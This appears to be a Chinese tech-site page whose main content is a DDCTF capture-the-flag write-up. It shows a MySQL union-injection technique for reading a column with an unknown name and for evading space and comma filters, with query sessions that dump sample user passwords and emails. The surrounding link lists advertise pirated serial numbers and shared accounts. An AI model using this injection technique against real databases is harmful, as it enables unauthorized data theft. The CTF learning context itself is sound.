- 1PS提示:因为图层已锁定,无法编辑图层的处理方法
- 2picacg苹果版怎么找不到|picacg ios版是不是下架了介绍
- 3Adobe Illustrator CS5 序列号大全
- 4ACDsee注册码免费分享(含ACDsee18、ACDsee10等版本)
- 5PDF浏览器能看3D文件吗?PDF浏览器看3D文件图文详细教程
- 6Potato(土豆聊天)怎么换头像|Potato app更改头像方法介绍
- 7Potato(马铃薯聊天)怎么注册不了|Potato不能注册处理方法介绍
- 8最新的Adobe Illustrator CS4序列号大全
- 9Intel i7-9700K性能跑分曝光:同代提升约12%
- 10qq邮件是否已读怎么看 QQ邮箱已经发出去的邮件怎么知道对方是否已经查看
- 11XP系统怎么清除缓存?
- 12AMD推土机架构回顾:虽陨落却是Zen成功的垫脚石
[摘要]这篇文章主要给大家介绍了Mysql如何巧妙的绕过未知字段名的相关资料,文中给出了详细的示例代码供大家参考学习,对学习mysql具有一定的参考学习价值,需要的朋友们下面来一起看看吧。前言本文介绍的是DDCTF第五题,绕过未知字段名的技巧,这里拿本机来操作了下,思路很棒也很清晰,分享给大家,下面来看看...
这篇文章主要给大家介绍了Mysql如何巧妙的绕过未知字段名的相关资料,文中给出了详细的示例代码供大家参考学习,对学习mysql具有一定的参考学习价值,需要的朋友们下面来一起看看吧。前言
本文介绍的是DDCTF第五题,绕过未知字段名的技巧,这里拿本机来操作了下,思路很棒也很清晰,分享给大家,下面来看看详细的介绍:
实现思路
题目过滤空格和逗号,空格使用%0a,%0b,%0c,%0d,%a0,或者直接使用括号都可以绕过,逗号使用join绕过;
存放flag的字段名未知,information_schema.columns也将表名的hex过滤了,即获取不到字段名;这时可以利用联合查询,过程如下:
思想就是获取flag,让其在已知字段名下出现;
示例代码:
mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d; +---+---+---+---+ a b c d +---+---+---+---+ 1 2 3 4 +---+---+---+---+ 1 row in set (0.00 sec) mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d; +---+---+---+---+ 1 2 3 4 +---+---+---+---+ 1 2 3 4 +---+---+---+---+ 1 row in set (0.00 sec) mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user; +---+-------+----------+-------------+ 1 2 3 4 +---+-------+----------+-------------+ 1 2 3 4 1 admin admin888 110@110.com 2 test test123 119@119.com 3 cs cs123 120@120.com +---+-------+----------+-------------+ 4 rows in set (0.01 sec) mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e; +-------------+ 4 +-------------+ 4 110@110.com 119@119.com 120@120.com +-------------+ 4 rows in set (0.03 sec) mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3; +-------------+ 4 +-------------+ 120@120.com +-------------+ 1 row in set (0.01 sec) mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i; +-------------+----------+----------+-------------+ id username password email +-------------+----------+----------+-------------+ 1 admin admin888 110@110.com 120@120.com 1 1 1 +-------------+----------+----------+-------------+ 2 rows in set (0.04 sec)
总结
以上就是关于Mysql如何巧妙的绕过未知字段名的实例代码详解的详细内容,更多请关注php中文网其它相关文章!
学习教程快速掌握从入门到精通的SQL知识。
推荐资讯 总人气榜
最新教程 本月人气
- 1优酷军师联盟卡是什么?优酷军师联盟卡收集图文说明教程
- 2终极3国2017百度云资源(更新至第106集)
- 3爱奇艺vip免费试用 爱奇艺vip帐号共享(2017.7.7)
- 4如何用爱奇艺下载电影?爱奇艺下载视频图文说明教程
- 5QQ音乐如何发弹幕?QQ音乐弹幕使用图文说明教程
- 6我是僵尸3百度云全集资源
- 7寻人大师第二季百度云全集资源
- 8暴风影音如何加速播放?暴风影音加速播放图文说明教程_暴风影音_下载之家
- 9免费3组腾讯视频vip账号共享(2017.6.29)
- 10搜狐视频会员账号共享2017.6.28
- 11刘亚仁相关电视剧电影综艺百度云全集
- 12人生若如初相见百度云全集资源
- 1支付宝不能交水电费了吗 支付宝为什么不能交水电费了
- 2人人车怎么收费 人人车收费规范
- 3平板电脑wifi无线网络设置图文说明教程【图文详细说明】
- 4ios9 bug隐藏无用应用方法
- 5猎豹浏览器抢票不受12306新版验证码影响
- 63星版iphone6s与台积电版iphone6s续航哪一个好
- 7百度专车怎么收费 百度专车收费规范介绍
- 8华为pay与微信支付哪一个好 微信支付与huawei pay比较区别
- 9酷狗怎么设置伴唱并录音 酷狗伴唱设置图文说明教程
- 10中兴grand x max+怎么?中兴grand x max+设置评测
- 11小皮助手安装失败怎么办 小皮助手安卓模拟器安装失败处理方法
- 12滴滴打屁怎么用 滴滴打屁app使用图文说明教程
